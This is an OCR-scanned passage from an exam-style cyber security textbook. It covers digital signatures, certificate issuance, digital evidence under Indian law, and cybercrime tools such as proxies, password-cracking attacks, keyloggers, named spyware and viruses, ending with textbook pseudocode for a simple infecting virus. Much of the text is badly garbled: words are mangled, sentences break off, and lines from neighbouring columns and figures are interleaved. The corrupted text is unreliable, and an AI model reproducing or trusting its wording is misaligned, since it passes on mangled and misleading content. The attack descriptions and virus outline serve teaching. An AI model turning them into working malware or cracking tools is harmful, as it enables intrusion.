(R.GP.V., June 2006, Dec. 2015) 
Ans. A digital signature is a document or file attachment that gives proof 
that the document or file has not been modified since creation. Digital signatures 
are same as handwritten signatures. For instance, you draw up your will, and 
when it is completed and fulfills certain legal criteria you attach your written 
signature. Your signature is witnessed by others to certify it really was you 
who signed. Later, your attached signature is used to verify the authenticity of 
the content. 

A digital signature is created by taking a hash total for a document or 
file and then encrypting it using a sender’s private key. Then the digital 


oOo 


ing | 


El a 


| 


i 
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ttached to the original material and the material is sent. This is 
reisa 
i 


nat 
n p fig. ^. 
si 


Signature 


Message 
Hash 


Sender's 
Private Key 


Fig. 4.1 Creating a Digital Signature 

he use of public and private keys 

ak that who can create the signature 

e can verify it. In fig. 4.1, the sender's 

and : key was used to encrypt, so a publicly 

jam key will be used to decipher. This 

Iri 

is shown in fig. 42. 

Applications - There are several 
applications of cryptography in network 
security. Most of these applications use public 
keys directly or indirectly. For using a public 
key, a person should prove that he actually owns the public key. That is why, 
the idea of certificates and certificate authorities (CAs) has been developed. 
The CA must sign the certificates to be valid. Such a proof is provided by 
digital signatures. 

Now-a-day's protocols using the services of CA are IPSec, SSL/TLS and 
S/MIME. PGP protocol uses certificates. 

0.11. Discuss the components of digital signature. (R.GP.V., Nov. 2019) 

Ans. Refer to Q.10. 

Q.12. What are the requirements for a digital signature ? Also give 
Properties of digital signature. 

Ans. We can formulate the following requirements for a digital signature — 

(i) The signature must be a bit pattern that depends on the message 
being signed. 

(ii) The signature must use some information unique to the sender, 
to prevent both forgery and denial. 


(iii) It must be relatively easy to produce the digital signature. 


[ Hre]? 


Signature 
Sender's 
Public Key 


Fig. 4.2 Using a Digital 
Signature at the Receiver 
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(iv) It must be relatively easy to recognize and verify the digita] Sign 
(V) It must be computationally infeasible to forge a digital si 2 


either by constructing a new message for an existing digital Signature Ute, 
Orb 
Y| 


constructing a fraudulent digital signature for a given message, 
(vi) It must be practical to retain a copy of the digital signa 
storage. 
A digital signature should have the following properties — 
(i) It must verify the author and the date and time of the si 


(ii) It must authenticate the contents at the time of the signatu 
(iii) It must be verifiable by third parties, to resolve disputes 


0.13. What are the basic functions of a signature ? 
Ans. For authenticating or executing a document, putting a mark es 
of one's name is referred to as signature. The basic functions of signatu tin 


re 
as follows — are 


(i) Authentication — The signatory acknowledges that he/sh 
authorizes and adopts the text in some meaningful way by sign inga documen, 


(ii) Identification — The signatory authority identifies himself/herself 
by the unique style of writing his name or mark, by signing the document 


(iii) Binding — If a person sign the document then he/she is bounded 
to the intent of that document. 


(iv) Security — Everyone has different style of writing his/her name 
or putting a mark, so this individual style of signing provides security against 
forgery. 

(v) Evidence — An evidence of above said identification, 
authentication and of being bound to the signed document, is a signature. 


The above said functions are important for commercial transactions. Since 
e-commerce is growing at a rapid speed, so the parties which are involved in 
€-transactions needed a confident system for dealing with each other. Therefore 
an alternative was developed for cyber world instead of physical signature on 
paper, because signature plays a vital role in e-commerce. Hence the concept 


of digital signature was in existence. The functions and purpose of digital 
Signatures are same. 


Q.14. What is idea behind certification authority hierarchy ? 
(R.GP¥., June 2016) 

Ans. A certification authority is a system that can validate a certificate. 
The authority of acting as a CA has to be with somebody who everybody 


poo 


n. 


ture in | 


Bnatur, 
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a CA has the authority to issue digital certificates to individuals 
ists Te alors which want to use those certificates in asymmetric key 
an a applications. 
oryptoe piscuss the concept of digital certificates. 
15. mall computer file is known as a digital certificate. For example, 
ns. A icc will be a computer file with the file name like ankit.cer 
my digital prem the first three characters of the word certificate. The file 
el a be different. Just as my passport specifies the association between 
exten! 


d my other characteristics like full name, nationality, date and place of 
e an tograph and signature, 


th pho’ K 
wren certificate specifies Digital Contificate 
i» association between me and 
t blic key. Fig. 4.3 shows the This is certified that he has been 
E of digital certificates. It working since 1990. 
4 noted that this is only a 


conceptual view and does not 
show the actual contents of a Fig. 4.3 Conceptual View of a Digital 


digital certificate. Certificate 


It has not been specified who is officially approving the association 
between a user and the user's digital certificate. Clearly, it has to be some 
authority in which all the concerned parties have trust and belief. Suppose a 
case where our passports are not issued by a government office, but by an 
ordinary shopkeeper. Would we trust the passports ? Likewise, digital 
certificates must be issued by some trusted entity. Otherwise there will be no 
trust on anybody's digital certificate. 

We know that a digital certificate establishes the relation between a user 
and her public key. Hence, a digital certificate must have the user name and 
the user's public key. This will prove that a particular public key is related to a 
particular user. In addition, what does a digital certificate keep ? Fig. 4.4 shows 
a simplified view of a sample digital certificate. 

A few interesting things are 
noted here. Firstly, my name is 
shown as subject name. In fact, 
any user's name in a digital 
Certificate is always referred to 
às subject name. Second is serial 
number. We shall see what it 
Means in due course of time. The 
Certificate also keeps other 
Pleces of information, like the 


Digital Cortificats 
Subject Name : Ankit Verma 
Public Key : <Ankit’s key> 
Serial Number : 1029 
: Emailkaverma(ajndiatimes.com 
: 01 Jan. 2009 
: 31 Dec. 2015 
: VeriSign 


Other data 
Valid From 
Valid To 
Issuer Name 


Fig. 4.4 Example of a Digital Certificate 
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validity date range for the 
P 
certificate and who has 'assport Entry 


issued it (issuer name). Fig. 
4.5 shows the meanings Of [Photograph and Signature 
these pieces of information 


by comparing them with the 
corresponding entries in my 
passport. 


number just as every passport has a unique passport number, No tw 
can have the same passport number. Likewise, no two digital ce 2 
have the same serial number. 

Q.16. What is a digital certificate ? What is the process of obtain; 
digital certificate ? (R.GPY, Dec. 2010, June jjj) 

Ans. Digital Certificate — Refer to Q.15. 

The steps involved in certificate creation are as follows — 


» CP ASSports 
Tüficates can 


(i) Key Generation — The action starts with the subject (that is, the 
user/organization) who needs to get a certificate. There are two differen 
methods for this purpose — 

(a) The subject can generate a private key and public key pair 
with the help of some software. Usually this software is a part of the Web 
browser or Web server. Alternatively, special software programs are used for 
this. The subject must contain the private key thus generated a secret. Then the 
subject sends the public key as well as other information and evidences about 
herself to the RA. Fig. 4.6 shows this. 


Bb. ndi 
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(b) Alternatively, the RA can create a key pair on the subject’s 

2 occur in cases where either if a particular requirement demands 

half. This ie must be centrally generted and distributed by the RA for the 
du security policies and key management or the user is not 

ea of ento! hnicalities involved in the generation of a key pair. Of course, 
aware of thg ap of this approach are the possibility of the RA knowing 
pram as well as the scope for this key to be exposed to 


vate key of the user, 1 s 
i tis generated and sent to the suitable user. Fig. 4.7 


hile in transit after i 


others W^ 
shows this. 
Registration 
Authority For 


Laike Key for 


Private Key for 
User X 


User X 
Fig. 4.7 RA Generating a Key Pair on Behalf of the Subject 

(i) Registration — This step is needed only if the user creates the 

key pair in the first step. If the RA creates the key pair on the user’s behalf, this 
step will also be a part of the first step itself. 

It is assumed that the user has created the key pair, the user now sends the 

public key and the associated registration information and all the evidence related 

herself to the RA. For this purpose, the software provides a wizard in which data is 


a: entered the user and when all data is correct, submits it. Then this data goes over the 
network/Internet to the 
RA. The certificate Subject "authori 
= Tequests format has been py & A RS 
—— Standardized and is = 
oC mea [Ee MM LS 
T = This is a Publio Key gg [aeter 
Cryptography Standards M 
«^, e ae Key (PKCS). The CSRisalso "ste Key 
" vate Key Public "eei Mo ASN eae 
Fig. 4.6 Subject Generating its Own Key Pair | m 
p 
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However, the evidence, may not be in the form of computer 
usually comprises of paper-based documents like a copy of the i 
SS 


EE 
: : nd 
business documents or income/tax statements, etc. Fig. 4.8 sh 


po; 
Ows this, Tt or 
(iii) Verification — After the registration process, the RA yen 


" d ipia i aa : e 
user’s credentials. This verification is done in two respects, as follo Tifies the 


(a) Firstly, the RA wants to verify the user’s cre Pri = 
evidences provided are correct and acceptable. If user is an in divid, ike the 
then simpler checks, like verifying the postal address, email id, phone User, 
passport or driving license details can be enough. If itis actually an ied numi 
then the RA would perhaps like to check the business record niz 

documents and credibility proofs. 

(b) Secondly ensure that the user who is requestin f 
certificate does indeed keep the private key corresponding to the & for 
that is sent as a part of the certificate request to the RA. This is most im 
since, there must be a record that the user keeps the private key corres portant, 
to the given public key. Otherwise, this can cause legal problems This ac 
known as checking the Proof Of Possession (POP) of the private key, w is 
uses the following approaches to perform this check — Me RA 

(1) The RA can want that the user must digitally Sign h 
Certificate Signing Request (CSR) using her private key. If the RA can ae 
the signature properly with the help of the public key of the user, the RA ç 
believe that user indeed keeps the private key. » 

(2)Alternatively, at this stage, the RA can generate a random 
number challenge, encrypt it with the user's public key and send the encrypted 
challenge to the user. If the user can properly decrypt the challenge using her 
private key, the RA can believe that the user keeps the right private key. 


(3) The RA can actually create a dummy certificate for the 
user, encrypt it using the user's public key and send it to the user. The user can 


decrypt it only if she can decrypt the encrypted certificate and get the plaintext 
certificate. 


(iv) Certificate Creation — Assuming that all the steps so far have 
been successful, the RA provides all the details of the user to the CA. The CA 
verifies itself (if needed) and generates a digital certificate for the user. There 
exist programs for creating certificates in the X.509 standard format. The CA 
transmits the certificate to the user and also keeps a copy of the certificate for 
its own record. The CA's certificate copy is kept in a certificate directory. The 
CA maintains this central storage location. The contents of the certificate 
directory contents are same as that of a telephone directory. This facilitates for 
a single-point access for certificate management and distribution. 


. No single standard exists that interprets the structure of a certificate 
directory. However, the X.500 standard is growing as a popular alternative. I 


: ation, 
s, historica] 


public key 
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storage of not only the digital certificates, as well as the information 
ami s the printers, network resources, the user’s personal information, 
p% t servers: numbers/extensions, email id’s, etc. at a central place in a 
elephone From this central repository, the directory clients can request 
A lled re information with the help of a directory access protocol, like 
c eight Directory Access Protocol (LDAP). LDAP permits users and 
to access X.500 directories, based on their privileges. 
A sends the certificate to the user. This is attached to an 
sends an email to the user, informing that the certificate is 
should download it from the CA’s site. 


ications 
Then the C 
or the CA 
nd that the user 
we verify the digital signatures ? 


email 
ready ? 

Q. 17. How can 

Ans. The Indian IT Act 2000 amended from the Indian Evidence Act 

describes that if the digital signature of any person is illegal to be affixed 

185 lectronic record, then such digital signature is to be proved by the person, 
toane de secure digital signature. Section 73A introduce in the Indian Evidence 
cod defines to court how digital signatures are verified. 
ü To verify digital signature produced by the subscriber the court may ask 
to the subscriber — "m 

G) That the controller or the certifying authority have to produce 
digital signature certificate. 

(ii) To verify the digital signature the court may ask any other person 
for applying the public key. 

The opinion of the certifying authority which issued the digital signature 
certificate will be the relevant fact when court form an opinion about digital 
signature of a person. 

In order to ascertain, that a digital signature of person who claims it to be 
affixed, the court has been empowered, to direct — 

(i) The controller or the certifying authority to produce the digital 
signature certificate. 

(ii) To verify the digital signature claimed to be affixed by that person 
by ang any other person to apply the public key listed in digital signature 
certificate. 


To prove the digital signatures, the digital signature certificate plays an 
important role as seen in both above said conditions. The IT Act 2000, 
introduced the section 85C of Indian Evidence Act, describes that unless the 
contrary is proved, that the information contained in digital signature certificate 
' correct while the digital signature certificate is accepted by the subscriber. 
The information provided by the subscriber, which has not been verified, is 
not included in it. Hence the person who is relying on the information will 
have to prove this information in any proceedings where proof of it is essential. 
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The secure digital signatures have a special legal status. It ca 
that a digital signature, at time wen it was affixed, was — n be Verifieg 
(i) Unique to the subscriber who was affixing it 
(ii) Capable of identifying such subscriber 
(ili) Created in a manner or using a means under the 
of the subscriber. 
Then such digital signature is assumed to be a secured digital s 
Until the contrary is proved, the court shall assume that it hag be 
with the intention of signing or approving the electronic record, whe 
digital signature is involved. 


Q.18. What do you mean by proof of electronic agreements > 

Ans. The electronic agreements can be classified into the followin, 
categories — £ 

(i) Both parties affixed digital signature on which is electronic agreemen 
(ii) Electronic agreement between the parties sendin, : 
through e-mail. 
(a) The party sending message with digital signature, 
(b) The party sending message without digital signatures, 

The section 85A of Indian Evidence Act 1872 has been assumed to included 
the definition for electronic agreements, signed by both parties — 

"Every electronic record seems to be an agreement containing the digital 
signatures of the parties which is concluded by affixing the digital signature 
by both parties. This will be assumed by court". 

Here the word *unless the contrary is proved' is not included but the concept 
is not conclusive and rebuttable yet. It implies that this is the responsibility of 
à person to, prove that the agreement was not concluded by affixing the digital 
signatures. 

Over the status of electronic records, the proof of terms and conditions 
was an important issue, after and before the IT Act 2000. The terms of a contract, 
according to the section 91 of the Indian Evidence Act 1872, are reduced to 
form a document. In the proof of terms of such contracts no evidence can be 
given. However, oral evidence which are admissible can be used to prove the 
statement of other facts in a contract. 

There is an confusing issue that whether section 91 would be applied to 
an electronic agreement because of the status of electronic records as 
documentary evidence prior to and after the IT Act. It may be a fact that the 
legislature does not want to apply this phenomena to electronic agreement 
because the section 91 of the Indian Evidence Act 1872, has not been amended 
as the sections 17, 34, 35 etc. While on the other hand even before IT Act 
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ts, so the section 91 would be applied 
the electronic RE Brien the terms and conditions of 
2000 tronic agn abit can be given except the e-agreement itself. The 
p ues cement, we on the e-agreements would be required to prove because 
“igital signan aar o m digital signature. 
of princ'P the rules of digital evidence ? 
number of sources like sized computer hard drives and 
dog cal fine e-mail messages, chat room logs, Internet service 
ackup mee mi from where the digital evidences originate. The rules for 
Er d e digital evidences are as follows — | l 
i) We can collect the digital evidence by engaging the appropriate 
i Feeding and law enforcement personnel. 
iti i) By capturing a picture of the system as accurate as possible. 
= We can collect digital evidences by keeping detailed notes with 
m and an automatic transcript should be generated if possible. 
pai and and printouts should be signed and dated. 
in (iv) We should note the difference between the system clock and 
coordinated universal time (UTC). For each timestamp it should be indicated 
ether the UTC or local time is used. 
(v) We should check by outlining all actions we took and at what 
times. For this detailed notes will be needed. l 

(vi) The data collected should be changed at minimum rate. This is 
not limited to the content changes; we should avoid updating file or directory 
access times. 
$ (vii) When we are confused to choose between collection and 
analysis, then we should do collection first and analysis later. 

(viii) Our procedures should be implementable and should be tested 
to ensure feasibility, particularly in a crisis, with aspect to an incident response 
policy. 

(ix) A systematic approach should be adopted to follow the guidelines 
laid down in our collection procedure, for each device. Since the speed is a 
critical issue so when we need to examine a number of devices, then we should 
spread our work among our team to collect the evidence in parallel. 

(x) Evidences should be collected in volatile to less volatile manner, 
the order of volatility is as follows — 

E (a) Registers and cache memory because as room the power is 
Switched off the data will be lost. 
(b) Routing table, ARP cache, process table, kernel statistics 
and memory are also volatile. 
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(c) Temporary file systems are less volatile than ab, 
(d) Disk is less volatile than above given, » 
(e) Remote logging and monitoring data that is p 
elevant to 


Ove, 


system. th 
(f) Physical configuration and network topology, le 
(g) Archival media is least volatile means diis 


even after the power is switched off. Vill be Storeg 


0.20. What do you mean by proving electronic messages ? 

Ans. Electronic messages are admissible as documenta s 
these are also electronic records. Here we shall study ees Evidence an 
messages under the law of evidence. Since use of Internet is Pa Of e. 
day, so the e-mail evidence can also be presented to the Peine. day by 
criminal trials. Although the electronic message technology is In Civil ang 
easy to use and cost-free mode of communication, but the Probali efficient, 
an electronic message is a question. Today anyone can open DB: us Value of 
in the names of other persons and send the message to each ide y easily 
messages and can create violence among them. Thus the e- T by sending 
vulnerable to misuse and abuse. mail system is 


The concept of digital signature enhances the evidenti ibili 

messages on which digital signatures are affixed. The neu hides s 

is used to encrypt the data and is recognized as the digital diaes iiem 

IT Act, 2000, is unique to the data and subscriber. Since the si i x 
identified by the digital signatures, so the digital signatures AA lift the 
evidentiary value of the signed e-message. The acknowledgement of recei t | 
of an electronic record and identification of the originator and adios 
defined in the section 12 of the IT Act 2000. Hence, proof of these ingredients 
may be applicable to the factual matrix. These ingredients would be good | 
evidence for identifying the originator and addressee and sending or receiving 
of the e-message, which seeks to be proved. 


The section 12 of IT Act 2000 is described as given below — 
(i) If the originator of the ackn 
owledgement has not agreed with 
d : 
i amies that the receipt of electronic record be given in a particular form 
y a particular method, then an acknowledgement may be given by- 
(a) Any communication by the addressee, automated or otherwise. 
(b) Any conduct of the addr i indi 
ra essee, sufficient to indicate to the 
originator thet the electronic record has been received. 
T D Mien if the originator has specified that the electronic 
cord by lia d only on receipt of an acknowledgement of such ele! 
dignis ait s" the electronic record shall be considered to never $ 
s the acknowledgement has been received. 


record 
ctronic 
ent by 
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<. Where if it has not specified that the electronic record shall be 

(iii) receipt of acknowledgement and the acknowledgement has 
pinding on ived by the originator within the specified time or agreed or if no 
not = ecified or agreed or if agreed to within a reasonable time, then 
area ive notice to the addressee stating that no acknowledgement 
ived by him and specifying a reasonable time by which the 
st be received by him. If with in the above said time 


has ment mu 4 
dge gement is received, he may treat the electronic record as 


oe has never been sent, after gru notice to ania 
21. What is the role of digital signature in digital evidence ? 

Q^ (R.GBV.,, Nov. 2018) 
ature a new section named section 3A was 
taining section 3 of digital signatures. An 
nic signature is an alternative propose of digital signature. Both of these 
parie sed for authentication of digital evidence (electronic record). So the 
noe authorities are needed to accommodate for both digital signature 
ei electronic signature. 

Neverthless anything contained in secti. 
subsection (2), any electronic record (digital 
bya subscriber, using electronic signature, 
may be specified in the second schedule. 

The electronic signature or digital signature technique shall be considered 
reliable if — 

(i) At the time o 
creation were under the control of signatory, 
authenticator or of no other person. 

(ii) After affixing digital signature, any alternation made to the 
digital signature, are detectable. 

(iii) After authenticating the informa! 


alteration made to it are detectable. 
(iv) The signature creation data or the authentication data linked to 


the signatory are within the context in which they are used. 

_ For the purpose of ascertaining whether the person by whom the digital 
signature is claimed to have been affixed or authenticated, the Central 
Government may prescribe the procedure. It should be notified in Official 
Gazette of the Central Government to add or omit digital signature and the 
procedure for affixing such signature from the second schedule. 

0.22. How can we check the validity of digital evidence ? 

Ans, Thi à T (R.GP.V, Nov. 2018, 2019) 
used for 5 : e process used in the case of digital evidence copies the process 
reliable ¢ ne evidence, this is only logical. The process must be documented 

nd repeatable since each step requires the use of tools or knowledge. 


efine electronic sign 


, To d 
Ans ndian IT Act, by re 


introduced inl 


on 3 but according to provision of 
l evidence), may be authenticated 
that are considered reliable and 


f signing the authentication data or signature 
or as the case may be, the 


tion by digital signature any 
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To understand the digital evidence is both legal and technical problem. Actual] 
both of these facts are related. The law specifies under what conditions whia 
can be seized, from where and from whom. It needs to determine what particulas 
piece of digital evidence is needed for checking validity, i.e. is it a particular 
file or an executable program or a word processing document etc. It may also 
required to check whether a particular piece of evidence is physically located 
It may also be necessary to show a technical basis for obtaining the legal 
authority to search. There are a number of context involved in actually validating 
a piece of digital evidence, three of them are as follows — 

(i) Physical Context — It must be definable in its physical form, 


i.e., it should reside on a specific piece of media. 
(ii) Logical Context—It must be identifiable as to its logical position, 
i.e., where does it reside relative to the file system. 
(iii) Legal Context — We must place the evidence in the correct 
context to read its meaning. This may require for looking at the evidence as 
machine language. 


The path taken by digital evidence is 


Physical 
Context 


shown in fig. 4.9 given below — 


Legal 
Context 


Logical 
Context 


Information 


Evidence 


Fig. 4.9 Path of Digital Evidence 


Once the extraction of digital evidence from a number of sources such 
that hard drives of seized computer, real-time e-mail messages, Internet service 
provider records, webpages, digital network traffic etc., is completed, the 
validity of extracted data is checked. 

A digital evidence is valid if it is admissible in the court or before law 
enforcement agencies for jurisdiction and accepted. If the court or law 
enforcement agencies accept the digital evidence as evidence for any crime 
then the digital evidence is valid. 

an 


TOOLS AND METHODS IN CYBERCRIME — proxy 
AND ANONYMIZERS, PASSWORD CRACKING, KEY 
AND SPYWARE, VIRUS AND WORMS, TROJAN HORSES, 


SERVERS 
LOGGERS 


BACKDOORS 


Q.1. What is proxy server ? How attackers attack on proxy server ? 


Ans. A computer, which acts as an intermediary for connections on a 
network with other computers on same network, is known as proxy server. 


The attackers try to establish a connection with the target system by 
connecting to a proxy server, through existing connection with proxy. Doing 
so the attacker is enable to surf on the web parallely and/or hide the attack. A 
client requests some services, while connects to the proxy server, available 
from a different server. The resources are provided to the client, when proxy 
server evaluates the request, by establishing connection to thé respective server 
and/or requests the required service on behalf of client. A proxy server can 
allow an attacker to hide his ID. 


The purposes of proxy server are as follows — 


| (i) Proxy server keep the systems hidden it means it secure the 
| systems. 


(ii) It uses caching to speed up access to a resource. It caches web- 
pages from web servers. 


(iii) Unwanted contents are filtered by some special proxy servers. 


(iv) To enable to connect number of computers on the Internet, 


whenever one has only one IP address, proxy server can be used as IP address 
multiplexer, 


A proxy server has an advantage that its cache memory can serve all 
users, If different users are requesting one or more websites then it is likely to 
€ 1n proxy server’s cache memory, which will improve user response time. 


? MRNA 
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pon fes opm ? How anonymizers work ? R, 
i at attempts to make activity on the Inte = 
ens ie Ex or anonymizer. It protect n 
accesses the T emen i ‘a de computer's identifying i Pers 
anonymous by utilizin 3 s behalf. The services that Fai Tation a 
are also known as ano g a website that acts as a proxy server ee web sun 
ee pice The Lance Cottrell developed f, "t dli 
removes all the information Ld sirf on Internet the ano s OI i, 
user's computer. nymizer hidey 


°K, Noy, 
t UNtrag, 


2019) 
User’s ble is 


eal 


2.3. HN do you mean by password cracking ? Explai, 

Ans. Like a lock, password is a key to get an e Nain in brief, 
systems. The process of recovering password from my Into computer; 
bius in or transmitted by a computer, is known = data that have x 
: enerally a common approach is followed by an Kis Password crack; 
or the password. The purposes of eg for makin ed 

s password crackin; 8 guess 
(i) It can be used to recover a forgotten E n HUND j 
(ii) System administrators can use eH crs i 
manner, to check for easily crackable passwords. Mp 
(iii) Password cracking can b 
attacker is not authenticated. : cia i Which 
An attempt to logon with diffe 
erent passwords i 
password cracking. In manual password cracking following bi DEN 
(i) A valid user account is found out iiic 
Gi) List of possible passwords is created 
= niic are ranked from high to low probability 
S. ry again and again to get a successful password 
es password can be guessed with kn 
€ ) owled f i 
personal A ea Some guessable passwords are as c iid E 
4 oe pes such as password, admin and administrator etc 
f s of letters fi : 
PEN io rom the QWERTY keyboard e.g., qwerty, 
Len ern name or login name can be used to guess the password. 
Me si s ip name can also be used to guess password. 
dee € .O.B., birth place etc. can be used to guess the password. 
iain A ers can use user's mobile number, vehicle number, 
Lem number etc. to guess the password i 
vii l 
——— ne of number such as 123456, 1234 can also b 

An 
list. It is d s wi po 
minii cracking and considered as time consuming à 


Preventive 


e used to 


password ina 
nd usually 


ee 
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ing attacks and explain each. 

cracking attacks are classified into the following 
m which is also known as 
to try each password 
k. It is also called as 
In this attack, a 
victim is 


es 

á — An automated progra 
pnm ep ill be execute by attacker 
popular attac 
“Janus attack". 
d the server to which a 
n the victim client try to 
ulent server instead of 
hes the password and 
swords of public 
cess 


. file can DE : 
spt Man-in-the midd 
pet-brigade attack” oF 5 a 
buc™ on is established between a victim an 
connect? by eave ing the network, and whe 
sere server, nected to the fraud 
: ITM server intercepts the call, has 
. Using this attack pas 
ts and passwords for financial website which are gaining ac 


cracked. 
sed 


(ii) Offline Attacks — In offline attacks systems are acces 
word files are copied from computer to removable 
lied from location, where 


the offline attacks are app 
ine attacks are given below — 

(a) Dictionary Atta plies in this attacker 

S password, 


attempts to match all the possible 


such as Admin. 
(b) Hybrid Attack — In hybrid attack: 


numbers is used to guess the password such as ABC123. 
(c) Brute Force Attack — In this attack all possible permutation 


combination of letters, symbols and special characters are applied to guess the 
password. 
(iii) Non-electronic Attacks — 


performed on computers. These attacks are bas 
victim, e.g. shoulder surfing in which attacker keep watch ove 


shoulder while he/she logs into the system. 
0.5. What is keylogging ? Explain types of. keyloggers. 
Or 
(R.GP.V., Nov. 2018) 


s a sequence of letters and 


These types of attacks are not 


ed on physical movement ofa 
r a person's 


Write a short note on keyloggers. 
using the keyboard is unaware that the ke 
sti i b 
ed ona keyboard are noted by others, is known as keylogging. Keystroke 
Pp ce keylogging is the easiest way to hack the passwords and monitor 
im's IT savvy behaviour. There are following types of keyloggers — 


Ans. When a person who is 


ML ed Keyloggers — The software programs installed on the 
and located between the OS and the keyboard hardware and reco! ds 


90 Cyber Security 


every key stroke, are known as key so 
e ER the software ligation i 
Ens D mie viruses. Such tools are generall 
Mies vias aa d Now the attacker can Bet victim's ; Uns 
a s e get installed on a computer p s information e 
ie TA 2n ile and an EXE (Executable) file 4 ne attacker į " 
g work. All recordings are done by pi installs ther " 
o (ii) Hardware Keyloggers — These are small h : i 
nnected to the computer or keyboard without is 
era system should be accessed physically to tn 
Federn saves every keystroke in a file or in th 
ce. This type of devices are installed on ATM : 
card's PINs by saving each keypress on the keyini 
pa Psi al The keyloggers installed on 
nd removed by antikeylo 
antikeyloggers are as follows — POS 


| (a) The installation of keylo. 
since the firewalls are not able to oo pale s Antikeylogger 


(b) Any updates of si 
; tu; 
required by antikeyloggers. gnature bases to work effectively is not 


(c) ATM and Internet ; 
dtitikeyloggere, rnet banking frauds can also be Prevented by 


(d) Identity theft is prevented by this. 


hese are jen Nag no 
Y installed o led on 


s devices 

han d € of user, 
TdWare keylo e 

memory o e 


í f 5 
hines to capture an 


Computer System 
of the advantages of 


Q.6. Write short note on spyware. (R.GP.V., Nov. 2019) 


Ans. Spywares are also i 
so install . : 
about user without their knowled x a TUER 
Spywares are installed by the es : f aei i e 
monitor other users; er of a shared/public computer to secretly 
As the impli 
personal eh nei ie Spyware means secret monitoring of users. All the 
surfing habits/ ations of users are collected by spywares such as Internet 
changed h reu websites visited etc. Internet surfing activities can be 
iios ioi lling another utility on the victim's computer. Computer 
ti d ng in slower Internet connection speeds and slowing of response 
ime, can also be changed by spywares. 
Some of the spywares are given below — 
recorded ad foin. 8 The URL of websites that are visited on Internet can be 
i ni Y. It has powerful keylogger engine to capture all passwords. 
received ss eBlaster — It is a powerful spy. It records all e-mails sent and 
"s ad : rious files downloaded/uploaded, record program searches an! 
ctivities besides the keylogging and website watching. 
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ed on mobile phones. After 


_ This tool may be install 
2 ation on phone and transfer 


i) Flexispy cretly records the convers 


ji 
(Ib ol, it € 


install ae e-mail address. ol ol 
PIED ecit! ja Professional An application that is used for monitoring 
a Wr P vites on the system is called wiretap professional spy. 

ng an also be captured by it. The keystrokes and passwords 


tant messages are captured by 


ve also recorded by it. 
this it also 


(v) Spector Pro 
i This spy also cal 
pe all websites visited. 
97. Write short note on viruses. 
Ans. A virus is à program that can “infect 
them. The modification includes a copy of t 
then go on to infect other programs. 
Biological viruses are tiny scraps of genetic code z DNA or RNA - that 
can take over the machinery of a living cell and trick it into making thousands 
of flawless replicas of the original virus. Like its biological counterpart, a 
computer virus carries in its instructional code the recipe for making perfect 
copies of itself. Lodged in a host computer, the typical virus takes temporary 
control of the computer's disk operating system. Then, whenever the infected 
computer comes into contact with an uninfected piece of software, a fresh 
copy of the virus passes into the new program. Thus, the infection can be 
spread from computer to computer by unsuspecting users who either swap 
other over a network. In a network 


disks or send programs to one an! 
environment, the ability to access applications and system services on other 


computers provides a perfect culture for the spread of a virus. 

A virus can do anything that other programs do. The only difference is 
that it attaches itself to another program and executes secretly when the host 
program is run. Once a virus is executing, it can perform any function, such 
as erasing files and programs. 


— All the chats and ins | 
ptures all sent/received mails. Besides 


(R.GBK,, June 2005, Dec. 2006) 
" other programs by modifying 
he virus program, which can 


Q.8. Discuss the virus characteristics. 
óh Ans. When a virus-infected program is run, the virus code is executed first. 
: e of the first tasks of virus code is to seek other programs not yet infected and 
2 pass on the infection to one or more of them. A truly malicious virus may then 

mud actions such as deleting certain files. An innocuous virus may attempt 
"b ld benign like printing a "hello world" message. Execution of the virus 

5 usually followed by execution of the host's original program. 

All the virus c 
eR the virus code need not be located at the start of the infected file. In 

ase [ ^ vig : 
virus code is both prepended and appended to the host file. Virus 


o 
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code could be split into several segments and inte 
infected file using JUMP statements at the end of e. 
of these cases, the size of the infected Program is | 
Program. This helps anti-virus software to dete 


TSperseg th 
5 TO) 
ach virus sep, Shou 


t th 
Nen e 
arger t an the mi 


ct infected code Original | 


To evade detection, some viruses modify the file service 


that returns attributes of files. By so doing, the service poa andie, 
programmed to retum the uninfected length of the file. Another tect aY be 
onis 


use compression so that the length of an infecte 
length of its original version. The virus writer includes a co 
in the viral code. To infect another file, the virus first com 
then prepends the virus code to the compressed file. The j 
uncompressed just prior to execution. 

One of the characteristic features of 
calls they make. System calls are used b 
Services of the operating system. They 
new processes, establish TCP connections, etc. Some Viruses 
copy their own code to other files, create/modify 
registry, or search for e-mail. Such “suspicious” 
distinguish malicious from benign code. 


d file remains the " IS to 


pression Touti 
presses that filea 


e 
nfected file m nd 


Ust be 
many viruses is the set of syste 
m 


Y application Programs to Tequi 
are made to read/writ, files, pea 


e 
iruses make calls to 
entries in the Windows 
calls are often Used to 


Q.9. What is a compression virus ? 
compression virus ? 


Ans. Refer to Q.8. 
Symptoms of Compression Virus Cruncher-1.0 — 
symptons of compression virus cruncher 1.0 are as follows — 
(i) Unpredictable computer behaviour. 
(i) Operating system shows unexpected error messages. 
(iii) Blue screen error in windows. 
(iv) Computer perform slowly. 
(V) Program does not respond and display not responding error message. 
(vi) Deletions of mysterious files and folder. 
(vii) Spam messages being sent from your email Id without your knowledge. 
Removing of Compression Virus Cruncher-1.0 — Compression virus 
cruncher 1.0 can be removed in the following ways — 
(i) Install anti-malware software. 
(ii) Window registry must be clean and update continuous. 


0.10. What are the characteristics of a virus ? Explain the dua) y 
a virus in detail. (R.GPV., Dec. 2010, June 


Ans. Virus Characteristics — Refer to Q.8. 


What can you do to detect q 
(R.GP.V, June 2917) 


The primary 
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rogram, or it 
ostpended to an Seopa ag duit te 
repended s hion. The key to its opera de and then 
shion. i e 
ome other fa ill first execute the virus co 
mbe when invoked, W! 


f virus is 
eneral structure ot 
: ror due oe s Ade ended to be infected 
fected PI^. inal code 0 à bap ond | 
infec te the origin this case, the virus code, P di a cti] 
^ din fe 2 ined that the entry point to the pi 
i d it is ass 
s, an ‘iit 
et rst line of the progra 
is the 


program V © = 
main; 


(got 514567: 


broutine infect-executable 1 
su 
ey random-executable-file; 


ile : = get- 
if (first-line-of-file = 1234567) 


then goto loop ' 
else prepend V to file;} 


outine do-damage : = 


abr whatever damage is to be done} 


igger-pulled : = 
a e f sere condition holds} 


main-program: = 


main : bhiis 
infect-execu $ . 
k trigger-pulled then do damage; 
goto next;} 

next : 


: Fig. 5.1 A Simple Virus 


An infected program starts with the virus code and works as im 

The first line of code is a jump to the main virus program. The secon 
i i d by the virus to determine whether or not a 

a special marker that is used by s : Seca Wihendhe 
potential victim program has already been infected with this virus. eters 
program is invoked, control is immediately transferred to the ES : 
program. The virus program first seeks out uninfected executable iles an: 
infects them. Next, the virus may perform some action, usually detrimental to 
